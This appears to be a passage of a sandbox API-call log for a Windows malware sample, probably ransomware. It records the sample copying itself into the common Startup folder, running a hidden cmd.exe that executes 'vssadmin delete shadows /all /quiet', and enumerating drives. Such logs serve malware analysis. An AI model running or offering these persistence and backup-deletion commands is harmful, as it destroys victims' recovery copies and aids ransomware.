(lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.832] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.832] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe", lpDst=0x2365fa8, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe") returned 0x44 [0189.832] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2375fb0 | out: hHeap=0x5e0000) returned 1 [0189.832] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2365fa8 | out: hHeap=0x5e0000) returned 1 [0189.833] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x2827020 [0189.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606968 [0189.836] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606968, Size=0x20) returned 0x6012c8 [0189.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6069b0 [0189.836] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6069b0, Size=0x20) returned 0x6014d0 [0189.836] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.836] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.836] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x1) returned 1 [0189.836] lstrlenW (lpString="kernel32.dll") returned 12 [0189.836] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0189.836] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.836] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6014d0 | out: hHeap=0x5e0000) returned 1 [0189.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Pg.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pg.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0189.836] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Pg.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\pg.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0189.837] ReadFile (in: hFile=0x338, lpBuffer=0x2827020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2827020*, lpNumberOfBytesRead=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.848] WriteFile (in: hFile=0x33c, lpBuffer=0x2827020*, nNumberOfBytesToWrite=0x70800, lpNumberOfBytesWritten=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2827020*, lpNumberOfBytesWritten=0x19ddcc*=0x70800, lpOverlapped=0x0) returned 1 [0189.856] ReadFile (in: hFile=0x338, lpBuffer=0x2827020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19ddcc, lpOverlapped=0x0 | out: lpBuffer=0x2827020*, lpNumberOfBytesRead=0x19ddcc*=0x0, lpOverlapped=0x0) returned 1 [0189.856] CloseHandle (hObject=0x33c) returned 1 [0189.865] CloseHandle (hObject=0x338) returned 1 [0189.865] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606b60 [0189.865] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606b60, Size=0x20) returned 0x6012c8 [0189.865] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606ad0 [0189.865] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ad0, Size=0x20) returned 0x601570 [0189.865] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0189.865] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0189.865] Wow64DisableWow64FsRedirection (in: OldValue=0x19ddd0 | out: OldValue=0x19ddd0*=0x1) returned 1 [0189.865] lstrlenW (lpString="kernel32.dll") returned 12 [0189.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601570 | out: hHeap=0x5e0000) returned 1 [0189.866] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0189.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6012c8 | out: hHeap=0x5e0000) returned 1 [0189.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2827020 | out: hHeap=0x5e0000) returned 1 [0189.872] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2345f98 | out: hHeap=0x5e0000) returned 1 [0189.872] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2355fa0 | out: hHeap=0x5e0000) returned 1 [0189.873] lstrlenW (lpString="%windir%\\System32") returned 17 [0189.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ae40 | out: hHeap=0x5e0000) returned 1 [0189.873] lstrlenW (lpString="%appdata%") returned 9 [0189.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601688 | out: hHeap=0x5e0000) returned 1 [0189.873] lstrlenW (lpString="%sh(Startup)%") returned 13 [0189.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6016d8 | out: hHeap=0x5e0000) returned 1 [0189.873] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0189.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60aed0 | out: hHeap=0x5e0000) returned 1 [0189.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6069b0 [0189.874] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6069b0, Size=0x20) returned 0x6012c8 [0189.874] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6012c8, Size=0x40) returned 0x60b080 [0189.874] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b080, Size=0x80) returned 0x6078d0 [0189.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606a88 [0189.874] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606a88, Size=0x20) returned 0x601610 [0189.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1fffc) returned 0x2345f98 [0189.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2365fa0 [0189.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x2375fa8 [0189.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606c08 [0189.875] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606c08, Size=0x20) returned 0x6014f8 [0189.875] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6014f8, Size=0x40) returned 0x60b158 [0189.875] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60b158, Size=0x80) returned 0x5ee258 [0189.875] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5ee258, Size=0x100) returned 0x5ef030 [0189.875] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0189.875] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ef030 | out: hHeap=0x5e0000) returned 1 [0189.875] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x2365fa0, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0189.875] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2375fa8 | out: hHeap=0x5e0000) returned 1 [0189.875] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2365fa0 | out: hHeap=0x5e0000) returned 1 [0189.876] CreatePipe (in: hReadPipe=0x19dd8c, hWritePipe=0x19dd90, lpPipeAttributes=0x19dd7c, nSize=0x0 | out: hReadPipe=0x19dd8c*=0x33c, hWritePipe=0x19dd90*=0x340) returned 1 [0189.876] CreatePipe (in: hReadPipe=0x19ddfc, hWritePipe=0x19de00, lpPipeAttributes=0x19dd7c, nSize=0x0 | out: hReadPipe=0x19ddfc*=0x344, hWritePipe=0x19de00*=0x348) returned 1 [0189.876] SetHandleInformation (hObject=0x340, dwMask=0x1, dwFlags=0x0) returned 1 [0189.877] SetHandleInformation (hObject=0x344, dwMask=0x1, dwFlags=0x0) returned 1 [0189.877] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19dd9c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x33c, hStdOutput=0x348, hStdError=0x348), lpProcessInformation=0x19ddec | out: lpCommandLine=0x0, lpProcessInformation=0x19ddec*(hProcess=0x350, hThread=0x34c, dwProcessId=0xf44, dwThreadId=0xd3c)) returned 1 [0190.598] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0190.598] WriteFile (in: hFile=0x340, lpBuffer=0x6078d0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19dd98, lpOverlapped=0x0 | out: lpBuffer=0x6078d0*, lpNumberOfBytesWritten=0x19dd98*=0x41, lpOverlapped=0x0) returned 1 [0190.598] CloseHandle (hObject=0x350) returned 1 [0190.598] CloseHandle (hObject=0x34c) returned 1 [0190.599] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x2345f98 | out: hHeap=0x5e0000) returned 1 [0190.600] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0190.600] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6078d0 | out: hHeap=0x5e0000) returned 1 [0190.600] lstrlenW (lpString="%comspec%") returned 9 [0190.600] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601610 | out: hHeap=0x5e0000) returned 1 [0190.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x34c [0190.600] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606980 [0190.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x606980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0190.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d230 [0190.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x60d230, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x358 [0190.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606ba8 [0190.601] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606ba8, Size=0x20) returned 0x6014d0 [0190.601] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6014d0, Size=0x40) returned 0x60b3e0 [0190.601] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0190.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd0) returned 0x601a30 [0190.601] GetLogicalDrives () returned 0x4 [0190.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10014) returned 0x2345f98 [0190.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606a88 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606a88, Size=0x20) returned 0x601688 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x601688, Size=0x40) returned 0x60aed0 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60aed0, Size=0x80) returned 0x6078d0 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5ef030, Size=0x200) returned 0x659820 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x659820, Size=0x400) returned 0x65a7b0 [0190.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65a7b0, Size=0x800) returned 0x6d9c20 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6d9c20, Size=0x1000) returned 0x6d9c20 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x2355fb8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606ad0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b90 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d2a0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ba8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x60d280 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606aa0 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d280, Size=0x8) returned 0x60d0f0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606bc0 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60d0f0, Size=0x10) returned 0x606a28 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606998 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606968 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606a28, Size=0x20) returned 0x6013b8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c50 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d0f0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x6069f8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x6069b0 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6013b8, Size=0x40) returned 0x60ae40 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x606a70 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x606a40 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x606a10 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x6069c8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606bd8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606a88 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d130 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606ab8 [0190.603] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60ae40, Size=0x80) returned 0x6078d0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c08 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606b48 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c20 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606b30 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6069e0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606ae8 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606a28 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d2b0 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606a58 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606b00 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606b60 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606b78 [0190.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606cc8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606ce0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606d10 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c68 [0190.604] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6078d0, Size=0x100) returned 0x5ef030 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606cf8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606e00 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606d28 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606e18 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c80 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606c98 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d240 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606cb0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606d58 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606d40 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x60d250 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606d70 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606d88 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d140 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606da0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606db8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606dd0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x606de8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659da0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659bc0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x659dd0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659d88 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x659c20 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659bd8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659ba8 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c50 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c68 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d260 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659b30 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659bf0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c98 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c80 [0190.604] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5ef030, Size=0x200) returned 0x659820 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659cb0 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d280 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659b60 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c38 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659c08 [0190.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659cc8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659d28 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659b00 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659b78 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659b90 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659db8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659b48 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659cf8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659d40 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659d70 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659d10 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659de8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659d58 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659ce0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659b18 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659fb0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a0e8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a0d0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d170 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659fe0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f08 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659fc8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d180 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659e18 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659e00 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659e78 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659e90 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a028 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f38 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a040 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f68 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x65a010 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659e48 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f50 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659ff8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a058 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x659ea8 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a070 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659ef0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a088 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a0a0 [0190.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f80 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659e30 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f98 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x60d1a0 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x60d310 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659ec0 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659e60 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659ed8 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x659f20 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a0b8 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x65a208 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a178 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a220 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a1d8 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a1f0 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x65a238 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a118 [0190.606] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x65a250 [0190.606] RtlReAllocateHeap (Heap=0x5e0000, 